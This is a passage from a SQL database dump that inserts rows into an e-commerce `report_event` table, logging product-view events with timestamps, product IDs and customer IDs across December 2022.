(3068, '2022-12-05 21:07:54', 1, 2064, 625, 1, 1),
(3069, '2022-12-05 21:07:56', 1, 2063, 625, 1, 1),
(3070, '2022-12-05 21:08:00', 1, 2063, 625, 1, 1),
(3071, '2022-12-05 21:08:01', 1, 2063, 625, 1, 1),
(3072, '2022-12-05 21:08:02', 1, 2062, 625, 1, 1),
(3073, '2022-12-05 21:08:07', 1, 2064, 625, 1, 1),
(3074, '2022-12-05 21:08:09', 1, 2062, 625, 1, 1),
(3075, '2022-12-05 21:08:13', 1, 2061, 625, 1, 1),
(3076, '2022-12-05 21:08:14', 1, 2062, 625, 1, 1),
(3077, '2022-12-05 21:08:14', 1, 2061, 625, 1, 1),
(3078, '2022-12-05 21:08:15', 1, 2062, 625, 1, 1),
(3079, '2022-12-05 21:08:16', 1, 2063, 625, 1, 1),
(3080, '2022-12-05 21:08:17', 1, 2061, 625, 1, 1),
(3081, '2022-12-05 21:08:20', 1, 2064, 625, 1, 1),
(3082, '2022-12-05 21:08:22', 1, 2062, 625, 1, 1),
(3083, '2022-12-05 21:08:24', 1, 2061, 625, 1, 1),
(3084, '2022-12-05 21:08:26', 1, 2061, 625, 1, 1),
(3085, '2022-12-05 21:08:26', 1, 2062, 625, 1, 1),
(3086, '2022-12-05 21:08:27', 1, 2062, 625, 1, 1),
(3087, '2022-12-05 21:08:28', 1, 2061, 625, 1, 1),
(3088, '2022-12-05 21:08:28', 1, 2063, 625, 1, 1),
(3089, '2022-12-05 21:08:31', 1, 2064, 625, 1, 1),
(3090, '2022-12-05 21:08:35', 1, 2062, 625, 1, 1),
(3091, '2022-12-05 21:08:35', 1, 2061, 625, 1, 1),
(3092, '2022-12-05 21:08:37', 1, 2061, 625, 1, 1),
(3093, '2022-12-05 21:08:38', 1, 2062, 625, 1, 1),
(3094, '2022-12-05 21:08:39', 1, 2061, 625, 1, 1),
(3095, '2022-12-05 21:08:39', 1, 2063, 625, 1, 1),
(3096, '2022-12-05 21:08:44', 1, 2064, 625, 1, 1),
(3097, '2022-12-05 21:08:48', 1, 2061, 625, 1, 1),
(3098, '2022-12-05 21:08:49', 1, 2062, 625, 1, 1),
(3099, '2022-12-05 21:08:50', 1, 2063, 625, 1, 1),
(3100, '2022-12-05 21:08:56', 1, 2064, 625, 1, 1),
(3101, '2022-12-05 21:08:58', 1, 2061, 625, 1, 1),
(3102, '2022-12-05 21:09:01', 1, 2060, 625, 1, 1),
(3103, '2022-12-05 21:09:02', 1, 2063, 625, 1, 1),
(3104, '2022-12-05 21:09:03', 1, 2062, 625, 1, 1),
(3105, '2022-12-05 21:09:03', 1, 2060, 625, 1, 1),
(3106, '2022-12-05 21:09:06', 1, 2061, 625, 1, 1),
(3107, '2022-12-05 21:09:07', 1, 2064, 625, 1, 1),
(3108, '2022-12-05 21:09:08', 1, 2060, 625, 1, 1),
(3109, '2022-12-05 21:09:10', 1, 2060, 625, 1, 1),
(3110, '2022-12-05 21:09:11', 1, 2063, 625, 1, 1),
(3111, '2022-12-05 21:09:11', 1, 2060, 625, 1, 1),
(3112, '2022-12-05 21:09:14', 1, 2062, 625, 1, 1),
(3113, '2022-12-05 21:09:15', 1, 2061, 625, 1, 1),
(3114, '2022-12-05 21:09:16', 1, 2060, 625, 1, 1),
(3115, '2022-12-05 21:09:17', 1, 2064, 625, 1, 1),
(3116, '2022-12-05 21:09:19', 1, 2060, 625, 1, 1),
(3117, '2022-12-05 21:09:20', 1, 2063, 625, 1, 1),
(3118, '2022-12-05 21:09:20', 1, 2060, 625, 1, 1),
(3119, '2022-12-05 21:09:22', 1, 2061, 625, 1, 1),
(3120, '2022-12-05 21:09:22', 1, 2062, 625, 1, 1),
(3121, '2022-12-05 21:09:23', 1, 2060, 625, 1, 1),
(3122, '2022-12-05 21:09:25', 1, 2064, 625, 1, 1),
(3123, '2022-12-05 21:09:27', 1, 2063, 625, 1, 1),
(3124, '2022-12-05 21:09:29', 1, 2061, 625, 1, 1),
(3125, '2022-12-05 21:09:30', 1, 2062, 625, 1, 1),
(3126, '2022-12-05 21:09:30', 1, 2060, 625, 1, 1),
(3127, '2022-12-05 21:09:34', 1, 2063, 625, 1, 1),
(3128, '2022-12-05 21:09:36', 1, 2061, 625, 1, 1),
(3129, '2022-12-05 21:09:37', 1, 2060, 625, 1, 1),
(3130, '2022-12-05 21:09:38', 1, 2062, 625, 1, 1),
(3131, '2022-12-05 21:09:44', 1, 2061, 625, 1, 1),
(3132, '2022-12-05 21:09:45', 1, 2060, 625, 1, 1),
(3133, '2022-12-05 21:09:46', 1, 2062, 625, 1, 1),
(3134, '2022-12-05 21:09:50', 1, 2059, 625, 1, 1),
(3135, '2022-12-05 21:09:51', 1, 2059, 625, 1, 1),
(3136, '2022-12-05 21:09:53', 1, 2061, 625, 1, 1),
(3137, '2022-12-05 21:09:53', 1, 2062, 625, 1, 1),
(3138, '2022-12-05 21:09:55', 1, 2060, 625, 1, 1),
(3139, '2022-12-05 21:09:57', 1, 2059, 625, 1, 1),
(3140, '2022-12-05 21:10:01', 1, 2059, 625, 1, 1),
(3141, '2022-12-05 21:10:01', 1, 2062, 625, 1, 1),
(3142, '2022-12-05 21:10:02', 1, 2059, 625, 1, 1),
(3143, '2022-12-05 21:10:03', 1, 2060, 625, 1, 1),
(3144, '2022-12-05 21:10:07', 1, 2059, 625, 1, 1),
(3145, '2022-12-05 21:10:10', 1, 2059, 625, 1, 1),
(3146, '2022-12-05 21:10:12', 1, 2059, 625, 1, 1),
(3147, '2022-12-05 21:10:13', 1, 2060, 625, 1, 1),
(3148, '2022-12-05 21:10:17', 1, 2058, 625, 1, 1),
(3149, '2022-12-05 21:10:19', 1, 2059, 625, 1, 1),
(3150, '2022-12-05 21:10:20', 1, 2058, 625, 1, 1),
(3151, '2022-12-05 21:10:23', 1, 2058, 625, 1, 1),
(3152, '2022-12-05 21:10:27', 1, 2060, 625, 1, 1),
(3153, '2022-12-05 21:10:30', 1, 2059, 625, 1, 1),
(3154, '2022-12-05 21:10:31', 1, 2058, 625, 1, 1),
(3155, '2022-12-05 21:10:33', 1, 2058, 625, 1, 1),
(3156, '2022-12-05 21:10:35', 1, 2058, 625, 1, 1),
(3157, '2022-12-05 21:10:41', 1, 2060, 625, 1, 1),
(3158, '2022-12-05 21:10:44', 1, 2058, 625, 1, 1),
(3159, '2022-12-05 21:10:45', 1, 2058, 625, 1, 1),
(3160, '2022-12-05 21:10:46', 1, 2055, 625, 1, 1),
(3161, '2022-12-05 21:10:47', 1, 2058, 625, 1, 1),
(3162, '2022-12-05 21:10:50', 1, 2055, 625, 1, 1),
(3163, '2022-12-05 21:10:51', 1, 2059, 625, 1, 1),
(3164, '2022-12-05 21:10:52', 1, 2055, 625, 1, 1),
(3165, '2022-12-05 21:10:54', 1, 2060, 625, 1, 1),
(3166, '2022-12-05 21:10:57', 1, 2058, 625, 1, 1),
(3167, '2022-12-05 21:10:59', 1, 2055, 625, 1, 1),
(3168, '2022-12-05 21:11:03', 1, 2059, 625, 1, 1),
(3169, '2022-12-05 21:11:04', 1, 2055, 625, 1, 1),
(3170, '2022-12-05 21:11:05', 1, 2055, 625, 1, 1),
(3171, '2022-12-05 21:11:10', 1, 2058, 625, 1, 1),
(3172, '2022-12-05 21:11:13', 1, 2059, 625, 1, 1),
(3173, '2022-12-05 21:11:14', 1, 2055, 625, 1, 1),
(3174, '2022-12-05 21:11:15', 1, 2055, 625, 1, 1),
(3175, '2022-12-05 21:11:17', 1, 2055, 625, 1, 1),
(3176, '2022-12-05 21:11:22', 1, 2058, 625, 1, 1),
(3177, '2022-12-05 21:11:27', 1, 2059, 625, 1, 1),
(3178, '2022-12-05 21:11:28', 1, 2055, 625, 1, 1),
(3179, '2022-12-05 21:11:33', 1, 2058, 625, 1, 1),
(3180, '2022-12-05 21:11:37', 1, 2059, 625, 1, 1),
(3181, '2022-12-05 21:11:39', 1, 2055, 625, 1, 1),
(3182, '2022-12-05 21:11:45', 1, 2058, 625, 1, 1),
(3183, '2022-12-05 21:11:48', 1, 2059, 625, 1, 1),
(3184, '2022-12-05 21:11:51', 1, 2055, 625, 1, 1),
(3185, '2022-12-05 21:11:56', 1, 2058, 625, 1, 1),
(3186, '2022-12-05 21:12:00', 1, 2059, 625, 1, 1),
(3187, '2022-12-05 21:12:03', 1, 2055, 625, 1, 1),
(3188, '2022-12-05 21:12:06', 1, 2058, 625, 1, 1),
(3189, '2022-12-05 21:12:13', 1, 2059, 625, 1, 1),
(3190, '2022-12-05 21:12:15', 1, 2055, 625, 1, 1),
(3191, '2022-12-05 21:12:18', 1, 2058, 625, 1, 1),
(3192, '2022-12-05 21:12:26', 1, 2054, 625, 1, 1),
(3193, '2022-12-05 21:12:27', 1, 2054, 625, 1, 1),
(3194, '2022-12-05 21:12:30', 1, 2058, 625, 1, 1);
INSERT INTO `report_event` (`event_id`, `logged_at`, `event_type_id`, `object_id`, `subject_id`, `subtype`, `store_id`) VALUES
(3195, '2022-12-05 21:12:31', 1, 2055, 625, 1, 1),
(3196, '2022-12-05 21:12:32', 1, 2054, 625, 1, 1),
(3197, '2022-12-05 21:12:39', 1, 2054, 625, 1, 1),
(3198, '2022-12-05 21:12:40', 1, 2054, 625, 1, 1),
(3199, '2022-12-05 21:12:43', 1, 2055, 625, 1, 1),
(3200, '2022-12-05 21:12:44', 1, 2054, 625, 1, 1),
(3201, '2022-12-05 21:12:52', 1, 2054, 625, 1, 1),
(3202, '2022-12-05 21:12:53', 1, 2054, 625, 1, 1),
(3203, '2022-12-05 21:12:55', 1, 2055, 625, 1, 1),
(3204, '2022-12-05 21:12:56', 1, 2054, 625, 1, 1),
(3205, '2022-12-05 21:13:06', 1, 2054, 625, 1, 1),
(3206, '2022-12-05 21:13:08', 1, 2055, 625, 1, 1),
(3207, '2022-12-05 21:13:17', 1, 2054, 625, 1, 1),
(3208, '2022-12-05 21:13:27', 1, 2054, 625, 1, 1),
(3209, '2022-12-05 21:13:39', 1, 2054, 625, 1, 1),
(3210, '2022-12-05 21:13:49', 1, 2054, 625, 1, 1),
(3211, '2022-12-05 21:14:00', 1, 2054, 625, 1, 1),
(3212, '2022-12-05 21:14:15', 1, 2054, 625, 1, 1),
(3213, '2022-12-05 21:14:17', 1, 2053, 625, 1, 1),
(3214, '2022-12-05 21:14:19', 1, 2053, 625, 1, 1),
(3215, '2022-12-05 21:14:21', 1, 2053, 625, 1, 1),
(3216, '2022-12-05 21:14:28', 1, 2054, 625, 1, 1),
(3217, '2022-12-05 21:14:29', 1, 2053, 625, 1, 1),
(3218, '2022-12-05 21:14:32', 1, 2053, 625, 1, 1),
(3219, '2022-12-05 21:14:35', 1, 2053, 625, 1, 1),
(3220, '2022-12-05 21:14:41', 1, 2053, 625, 1, 1),
(3221, '2022-12-05 21:14:44', 1, 2054, 625, 1, 1),
(3222, '2022-12-05 21:14:45', 1, 2053, 625, 1, 1),
(3223, '2022-12-05 21:14:47', 1, 2053, 625, 1, 1),
(3224, '2022-12-05 21:14:56', 1, 2053, 625, 1, 1),
(3225, '2022-12-05 21:15:07', 1, 2053, 625, 1, 1),
(3226, '2022-12-05 21:15:18', 1, 2053, 625, 1, 1),
(3227, '2022-12-05 21:15:30', 1, 2053, 625, 1, 1),
(3228, '2022-12-05 21:15:42', 1, 2053, 625, 1, 1),
(3229, '2022-12-05 21:15:54', 1, 2053, 625, 1, 1),
(3230, '2022-12-05 21:16:06', 1, 2053, 625, 1, 1),
(3231, '2022-12-05 21:16:16', 1, 2053, 625, 1, 1),
(3232, '2022-12-05 21:16:30', 1, 2053, 625, 1, 1),
(3233, '2022-12-06 05:06:32', 1, 2063, 0, 1, 1),
(3234, '2022-12-06 07:02:51', 1, 2053, 0, 1, 1),
(3235, '2022-12-06 07:02:59', 1, 2054, 0, 1, 1),
(3236, '2022-12-06 07:03:09', 1, 2055, 0, 1, 1),
(3237, '2022-12-06 07:03:38', 1, 2064, 0, 1, 1),
(3238, '2022-12-06 07:03:57', 1, 2063, 0, 1, 1),
(3239, '2022-12-06 07:04:08', 1, 2062, 0, 1, 1),
(3240, '2022-12-06 07:04:17', 1, 2060, 0, 1, 1),
(3241, '2022-12-06 07:04:30', 1, 2059, 0, 1, 1),
(3242, '2022-12-06 07:04:39', 1, 2061, 0, 1, 1),
(3243, '2022-12-06 07:04:48', 1, 2058, 0, 1, 1),
(3244, '2022-12-07 01:04:07', 1, 2063, 0, 1, 1),
(3245, '2022-12-07 06:50:46', 1, 2062, 0, 1, 1),
(3246, '2022-12-07 06:58:00', 1, 2061, 0, 1, 1),
(3247, '2022-12-07 08:31:06', 1, 2059, 0, 1, 1),
(3248, '2022-12-07 11:03:09', 1, 2060, 0, 1, 1),
(3249, '2022-12-07 12:58:28', 1, 2061, 0, 1, 1),
(3250, '2022-12-07 20:26:21', 1, 2060, 0, 1, 1),
(3251, '2022-12-07 20:47:51', 1, 2064, 0, 1, 1),
(3252, '2022-12-07 22:09:16', 1, 2055, 0, 1, 1),
(3253, '2022-12-08 04:50:13', 1, 2062, 0, 1, 1),
(3254, '2022-12-08 11:48:03', 1, 2054, 0, 1, 1),
(3255, '2022-12-08 11:48:24', 1, 2055, 0, 1, 1),
(3256, '2022-12-08 11:48:58', 1, 2064, 0, 1, 1),
(3257, '2022-12-08 11:50:00', 1, 2063, 0, 1, 1),
(3258, '2022-12-08 11:50:15', 1, 2062, 0, 1, 1),
(3259, '2022-12-08 11:50:31', 1, 2060, 0, 1, 1),
(3260, '2022-12-08 11:50:39', 1, 2059, 0, 1, 1),
(3261, '2022-12-08 11:51:01', 1, 2061, 0, 1, 1),
(3262, '2022-12-08 11:51:13', 1, 2058, 0, 1, 1),
(3263, '2022-12-08 17:02:05', 1, 2062, 0, 1, 1),
(3264, '2022-12-08 17:03:43', 1, 2062, 0, 1, 1),
(3265, '2022-12-08 20:09:37', 1, 2064, 0, 1, 1),
(3266, '2022-12-08 23:54:30', 1, 2063, 0, 1, 1),
(3267, '2022-12-09 06:57:35', 1, 2064, 0, 1, 1),
(3268, '2022-12-09 09:05:07', 1, 2064, 0, 1, 1),
(3269, '2022-12-09 11:44:44', 1, 2054, 0, 1, 1),
(3270, '2022-12-09 19:59:27', 1, 2064, 0, 1, 1),
(3271, '2022-12-10 07:17:28', 1, 2064, 0, 1, 1),
(3272, '2022-12-10 08:26:07', 1, 2061, 0, 1, 1),
(3273, '2022-12-10 11:24:34', 1, 2061, 0, 1, 1),
(3274, '2022-12-10 11:48:35', 1, 2053, 0, 1, 1),
(3275, '2022-12-10 11:48:44', 1, 2054, 0, 1, 1),
(3276, '2022-12-10 11:48:59', 1, 2055, 0, 1, 1),
(3277, '2022-12-10 11:50:22', 1, 2064, 0, 1, 1),
(3278, '2022-12-10 11:50:36', 1, 2063, 0, 1, 1),
(3279, '2022-12-10 11:50:45', 1, 2062, 0, 1, 1),
(3280, '2022-12-10 11:50:55', 1, 2060, 0, 1, 1),
(3281, '2022-12-10 11:51:05', 1, 2059, 0, 1, 1),
(3282, '2022-12-10 11:51:17', 1, 2061, 0, 1, 1),
(3283, '2022-12-10 11:51:33', 1, 2058, 0, 1, 1),
(3284, '2022-12-10 15:47:13', 1, 2061, 0, 1, 1),
(3285, '2022-12-10 19:50:50', 1, 2055, 0, 1, 1),
(3286, '2022-12-10 23:46:51', 1, 2059, 0, 1, 1),
(3287, '2022-12-11 05:16:30', 1, 2063, 0, 1, 1),
(3288, '2022-12-11 05:16:40', 1, 2063, 0, 1, 1),
(3289, '2022-12-11 17:18:23', 1, 2061, 0, 1, 1),
(3290, '2022-12-11 19:30:52', 1, 2053, 0, 1, 1),
(3291, '2022-12-11 19:43:16', 1, 2064, 0, 1, 1),
(3292, '2022-12-12 05:49:38', 1, 2053, 0, 1, 1),
(3293, '2022-12-12 05:49:43', 1, 2054, 0, 1, 1),
(3294, '2022-12-12 05:49:49', 1, 2055, 0, 1, 1),
(3295, '2022-12-12 05:50:06', 1, 2064, 0, 1, 1),
(3296, '2022-12-12 05:50:15', 1, 2063, 0, 1, 1),
(3297, '2022-12-12 05:50:20', 1, 2062, 0, 1, 1),
(3298, '2022-12-12 05:50:25', 1, 2060, 0, 1, 1),
(3299, '2022-12-12 05:50:29', 1, 2059, 0, 1, 1),
(3300, '2022-12-12 05:50:33', 1, 2061, 0, 1, 1),
(3301, '2022-12-12 05:50:38', 1, 2058, 0, 1, 1),
(3302, '2022-12-12 06:33:28', 1, 2058, 0, 1, 1),
(3303, '2022-12-12 09:30:00', 1, 2063, 0, 1, 1),
(3304, '2022-12-12 09:35:11', 1, 2062, 0, 1, 1),
(3305, '2022-12-13 03:29:34', 1, 2053, 0, 1, 1),
(3306, '2022-12-13 03:34:15', 1, 2063, 0, 1, 1),
(3307, '2022-12-13 03:34:19', 1, 2062, 0, 1, 1),
(3308, '2022-12-13 03:34:22', 1, 2060, 0, 1, 1),
(3309, '2022-12-13 03:34:25', 1, 2059, 0, 1, 1),
(3310, '2022-12-13 07:04:42', 1, 2063, 0, 1, 1),
(3311, '2022-12-13 09:52:54', 1, 2060, 0, 1, 1),
(3312, '2022-12-13 10:04:58', 1, 2063, 0, 1, 1),
(3313, '2022-12-13 10:36:43', 1, 2058, 0, 1, 1),
(3314, '2022-12-13 11:36:22', 1, 2055, 0, 1, 1),
(3315, '2022-12-13 13:04:25', 1, 2055, 0, 1, 1),
(3316, '2022-12-13 13:36:19', 1, 2061, 0, 1, 1),
(3317, '2022-12-13 14:45:19', 1, 2062, 0, 1, 1),
(3318, '2022-12-13 16:44:46', 1, 2054, 0, 1, 1),
(3319, '2022-12-13 17:08:31', 1, 2059, 0, 1, 1),
(3320, '2022-12-13 17:26:08', 1, 2064, 0, 1, 1),
(3321, '2022-12-13 18:01:43', 1, 2058, 0, 1, 1),
(3322, '2022-12-13 20:05:48', 1, 2064, 0, 1, 1),
(3323, '2022-12-14 07:27:20', 1, 2060, 0, 1, 1),
(3324, '2022-12-14 07:39:10', 1, 2063, 0, 1, 1),
(3325, '2022-12-14 08:10:31', 1, 2058, 0, 1, 1),
(3326, '2022-12-14 09:08:56', 1, 2055, 0, 1, 1),
(3327, '2022-12-14 11:10:11', 1, 2061, 0, 1, 1),
(3328, '2022-12-14 12:20:37', 1, 2062, 0, 1, 1),
(3329, '2022-12-14 14:18:52', 1, 2054, 0, 1, 1),
(3330, '2022-12-14 14:41:43', 1, 2059, 0, 1, 1),
(3331, '2022-12-14 14:58:48', 1, 2064, 0, 1, 1),
(3332, '2022-12-14 16:59:36', 1, 2061, 0, 1, 1),
(3333, '2022-12-14 19:47:01', 1, 2064, 0, 1, 1),
(3334, '2022-12-15 01:37:07', 1, 2061, 61, 0, 1),
(3335, '2022-12-15 01:37:11', 5, 2061, 61, 0, 1),
(3336, '2022-12-15 04:17:19', 1, 2061, 0, 1, 1),
(3337, '2022-12-15 04:55:46', 1, 2060, 0, 1, 1),
(3338, '2022-12-15 05:11:02', 1, 2063, 0, 1, 1),
(3339, '2022-12-15 05:50:58', 1, 2058, 0, 1, 1),
(3340, '2022-12-15 06:15:49', 1, 2060, 0, 1, 1),
(3341, '2022-12-15 07:06:14', 1, 2055, 0, 1, 1),
(3342, '2022-12-15 09:37:27', 1, 2054, 0, 1, 1),
(3343, '2022-12-15 09:37:32', 1, 2055, 0, 1, 1),
(3344, '2022-12-15 09:37:43', 1, 2064, 0, 1, 1),
(3345, '2022-12-15 09:37:45', 1, 2061, 0, 1, 1),
(3346, '2022-12-15 09:37:48', 1, 2063, 0, 1, 1),
(3347, '2022-12-15 09:37:54', 1, 2062, 0, 1, 1),
(3348, '2022-12-15 09:38:00', 1, 2060, 0, 1, 1),
(3349, '2022-12-15 09:38:04', 1, 2059, 0, 1, 1),
(3350, '2022-12-15 09:38:10', 1, 2061, 0, 1, 1),
(3351, '2022-12-15 09:38:14', 1, 2058, 0, 1, 1),
(3352, '2022-12-15 09:50:14', 1, 2054, 0, 1, 1),
(3353, '2022-12-15 11:02:09', 1, 2062, 0, 1, 1),
(3354, '2022-12-15 13:25:12', 1, 2064, 0, 1, 1),
(3355, '2022-12-15 13:27:37', 1, 2054, 0, 1, 1),
(3356, '2022-12-15 13:41:03', 1, 2061, 0, 1, 1),
(3357, '2022-12-15 13:57:13', 1, 2059, 0, 1, 1),
(3358, '2022-12-15 14:19:21', 1, 2064, 0, 1, 1),
(3359, '2022-12-15 14:31:35', 1, 2063, 0, 1, 1),
(3360, '2022-12-15 19:44:32', 1, 2053, 0, 1, 1),
(3361, '2022-12-16 05:07:40', 1, 2054, 0, 1, 1),
(3362, '2022-12-16 10:01:47', 1, 2062, 0, 1, 1),
(3363, '2022-12-17 08:15:10', 1, 2055, 0, 1, 1),
(3364, '2022-12-17 21:02:36', 1, 2064, 0, 1, 1),
(3365, '2022-12-18 01:00:57', 1, 2059, 0, 1, 1),
(3366, '2022-12-18 03:58:22', 1, 2064, 0, 1, 1),
(3367, '2022-12-18 09:43:02', 1, 2055, 0, 1, 1),
(3368, '2022-12-18 10:21:17', 1, 2064, 0, 1, 1),
(3369, '2022-12-19 10:49:21', 1, 2060, 0, 1, 1),
(3370, '2022-12-20 00:47:27', 1, 2054, 0, 1, 1),
(3371, '2022-12-20 12:31:00', 1, 2063, 0, 1, 1),
(3372, '2022-12-20 14:01:37', 1, 2059, 0, 1, 1),
(3373, '2022-12-20 16:04:57', 1, 2063, 0, 1, 1),
(3374, '2022-12-21 01:39:40', 1, 2053, 0, 1, 1),
(3375, '2022-12-21 01:53:41', 1, 2064, 0, 1, 1),
(3376, '2022-12-21 02:56:29', 1, 2054, 0, 1, 1),
(3377, '2022-12-22 16:28:47', 1, 2061, 0, 1, 1),
(3378, '2022-12-22 18:54:29', 1, 2053, 0, 1, 1),
(3379, '2022-12-22 20:46:46', 1, 2064, 0, 1, 1),
(3380, '2022-12-22 21:49:31', 1, 2060, 0, 1, 1),
(3381, '2022-12-23 01:33:47', 1, 2062, 0, 1, 1),
(3382, '2022-12-23 01:39:31', 1, 2060, 0, 1, 1),
(3383, '2022-12-23 01:47:46', 1, 2062, 0, 1, 1),
(3384, '2022-12-23 01:49:44', 1, 2055, 0, 1, 1),
(3385, '2022-12-23 02:03:54', 1, 2061, 0, 1, 1),
(3386, '2022-12-23 02:42:04', 1, 2058, 0, 1, 1),
(3387, '2022-12-23 03:10:35', 1, 2064, 0, 1, 1),
(3388, '2022-12-23 03:12:23', 1, 2059, 0, 1, 1),
(3389, '2022-12-23 03:13:20', 1, 2063, 0, 1, 1),
(3390, '2022-12-23 03:13:40', 1, 2063, 0, 1, 1),
(3391, '2022-12-23 03:45:11', 1, 2054, 0, 1, 1),
(3392, '2022-12-23 04:01:53', 1, 2061, 0, 1, 1),
(3393, '2022-12-23 04:47:55', 1, 2064, 0, 1, 1),
(3394, '2022-12-23 05:21:41', 1, 2055, 0, 1, 1),
(3395, '2022-12-23 05:23:06', 1, 2058, 0, 1, 1),
(3396, '2022-12-23 06:48:29', 1, 2054, 0, 1, 1),
(3397, '2022-12-23 08:21:01', 1, 2059, 0, 1, 1),
(3398, '2022-12-23 09:02:40', 1, 2060, 0, 1, 1),
(3399, '2022-12-23 10:43:32', 1, 2062, 0, 1, 1),
(3400, '2022-12-23 16:10:48', 1, 2064, 0, 1, 1),
(3401, '2022-12-24 10:49:16', 1, 2055, 0, 1, 1),
(3402, '2022-12-24 15:44:17', 1, 2060, 0, 1, 1),
(3403, '2022-12-24 15:56:00', 1, 2063, 0, 1, 1),
(3404, '2022-12-24 15:58:01', 1, 2064, 0, 1, 1),
(3405, '2022-12-24 16:27:26', 1, 2058, 0, 1, 1),
(3406, '2022-12-24 17:28:20', 1, 2055, 0, 1, 1),
(3407, '2022-12-24 19:28:17', 1, 2061, 0, 1, 1),
(3408, '2022-12-24 20:43:03', 1, 2062, 0, 1, 1),
(3409, '2022-12-24 22:51:47', 1, 2054, 0, 1, 1),
(3410, '2022-12-24 23:15:50', 1, 2059, 0, 1, 1),
(3411, '2022-12-24 23:34:48', 1, 2064, 0, 1, 1),
(3412, '2022-12-25 01:08:05', 1, 2060, 0, 1, 1),
(3413, '2022-12-25 01:12:13', 1, 2060, 0, 1, 1),
(3414, '2022-12-25 04:11:25', 1, 2060, 0, 1, 1),
(3415, '2022-12-25 04:27:56', 1, 2063, 0, 1, 1),
(3416, '2022-12-25 04:48:03', 1, 2060, 0, 1, 1),
(3417, '2022-12-25 05:10:08', 1, 2058, 0, 1, 1),
(3418, '2022-12-25 06:39:41', 1, 2055, 0, 1, 1),
(3419, '2022-12-25 07:17:04', 1, 2064, 0, 1, 1),
(3420, '2022-12-25 08:08:04', 1, 2055, 0, 1, 1),
(3421, '2022-12-25 09:04:09', 1, 2061, 0, 1, 1),
(3422, '2022-12-25 10:28:13', 1, 2062, 0, 1, 1),
(3423, '2022-12-25 12:27:46', 1, 2063, 0, 1, 1),
(3424, '2022-12-25 12:40:09', 1, 2054, 0, 1, 1),
(3425, '2022-12-25 13:05:43', 1, 2059, 0, 1, 1),
(3426, '2022-12-25 13:25:40', 1, 2064, 0, 1, 1),
(3427, '2022-12-25 15:58:42', 1, 2060, 0, 1, 1),
(3428, '2022-12-25 16:11:10', 1, 2063, 0, 1, 1),
(3429, '2022-12-25 17:28:59', 1, 2060, 0, 1, 1),
(3430, '2022-12-25 17:47:08', 1, 2063, 0, 1, 1),
(3431, '2022-12-25 18:34:55', 1, 2058, 0, 1, 1),
(3432, '2022-12-25 20:08:50', 1, 2055, 0, 1, 1),
(3433, '2022-12-25 21:54:31', 1, 2053, 0, 1, 1),
(3434, '2022-12-25 23:12:37', 1, 2061, 0, 1, 1),
(3435, '2022-12-26 00:55:36', 1, 2062, 0, 1, 1),
(3436, '2022-12-26 01:01:25', 1, 2053, 0, 1, 1),
(3437, '2022-12-26 03:51:02', 1, 2054, 0, 1, 1),
(3438, '2022-12-26 04:24:27', 1, 2059, 0, 1, 1),
(3439, '2022-12-26 04:51:24', 1, 2064, 0, 1, 1),
(3440, '2022-12-26 06:20:03', 1, 2060, 0, 1, 1),
(3441, '2022-12-26 06:39:05', 1, 2063, 0, 1, 1),
(3442, '2022-12-26 07:33:44', 1, 2058, 0, 1, 1),
(3443, '2022-12-26 09:12:07', 1, 2055, 0, 1, 1),
(3444, '2022-12-26 11:50:52', 1, 2061, 0, 1, 1),
(3445, '2022-12-26 13:08:49', 1, 2062, 0, 1, 1),
(3446, '2022-12-26 14:13:25', 1, 2055, 0, 1, 1),
(3447, '2022-12-26 15:20:27', 1, 2054, 0, 1, 1),
(3448, '2022-12-26 15:46:39', 1, 2059, 0, 1, 1),
(3449, '2022-12-26 16:06:11', 1, 2064, 0, 1, 1),
(3450, '2022-12-26 16:20:42', 1, 2054, 0, 1, 1),
(3451, '2022-12-26 20:32:54', 1, 2060, 0, 1, 1),
(3452, '2022-12-26 20:45:23', 1, 2063, 0, 1, 1),
(3453, '2022-12-26 21:17:48', 1, 2058, 0, 1, 1),
(3454, '2022-12-26 22:22:01', 1, 2055, 0, 1, 1),
(3455, '2022-12-27 00:27:05', 1, 2061, 0, 1, 1),
(3456, '2022-12-27 01:39:12', 1, 2062, 0, 1, 1),
(3457, '2022-12-27 03:06:24', 1, 2060, 0, 1, 1),
(3458, '2022-12-27 03:18:37', 1, 2063, 0, 1, 1),
(3459, '2022-12-27 03:50:28', 1, 2058, 0, 1, 1),
(3460, '2022-12-27 04:49:10', 1, 2055, 0, 1, 1),
(3461, '2022-12-27 06:52:03', 1, 2061, 0, 1, 1),
(3462, '2022-12-27 08:10:36', 1, 2062, 0, 1, 1),
(3463, '2022-12-27 10:22:00', 1, 2054, 0, 1, 1),
(3464, '2022-12-27 10:47:48', 1, 2059, 0, 1, 1),
(3465, '2022-12-27 11:06:59', 1, 2064, 0, 1, 1),
(3466, '2022-12-27 14:21:51', 1, 2054, 0, 1, 1),
(3467, '2022-12-27 15:51:40', 1, 2064, 0, 1, 1),
(3468, '2022-12-27 18:32:04', 1, 2064, 0, 1, 1),
(3469, '2022-12-27 20:07:57', 1, 2064, 0, 1, 1),
(3470, '2022-12-27 20:57:59', 1, 2060, 0, 1, 1),
(3471, '2022-12-28 01:32:32', 1, 2064, 0, 1, 1),
(3472, '2022-12-28 07:35:30', 1, 2054, 0, 1, 1),
(3473, '2022-12-28 07:35:33', 1, 2059, 0, 1, 1),
(3474, '2022-12-28 07:35:36', 1, 2061, 0, 1, 1),
(3475, '2022-12-28 07:35:40', 1, 2058, 0, 1, 1),
(3476, '2022-12-28 08:17:44', 1, 2055, 0, 1, 1),
(3477, '2022-12-28 13:56:50', 1, 2062, 0, 1, 1),
(3478, '2022-12-28 14:09:24', 1, 2060, 0, 1, 1),
(3479, '2022-12-28 18:38:56', 1, 2058, 0, 1, 1),
(3480, '2022-12-28 20:24:49', 1, 2063, 0, 1, 1),
(3481, '2022-12-28 22:14:23', 1, 2054, 0, 1, 1),
(3482, '2022-12-28 23:50:54', 1, 2061, 0, 1, 1),
(3483, '2022-12-29 03:43:00', 1, 2064, 0, 1, 1),
(3484, '2022-12-29 05:34:10', 1, 2053, 0, 1, 1),
(3485, '2022-12-29 16:23:59', 1, 2055, 0, 1, 1),
(3486, '2022-12-29 16:24:01', 1, 2054, 0, 1, 1),
(3487, '2022-12-29 16:27:08', 1, 2064, 0, 1, 1),
(3488, '2022-12-29 16:31:20', 1, 2063, 0, 1, 1),
(3489, '2022-12-29 16:32:01', 1, 2062, 0, 1, 1),
(3490, '2022-12-29 16:32:03', 1, 2060, 0, 1, 1),
(3491, '2022-12-29 16:32:05', 1, 2061, 0, 1, 1),
(3492, '2022-12-29 16:32:07', 1, 2058, 0, 1, 1),
(3493, '2022-12-29 16:32:08', 1, 2059, 0, 1, 1),
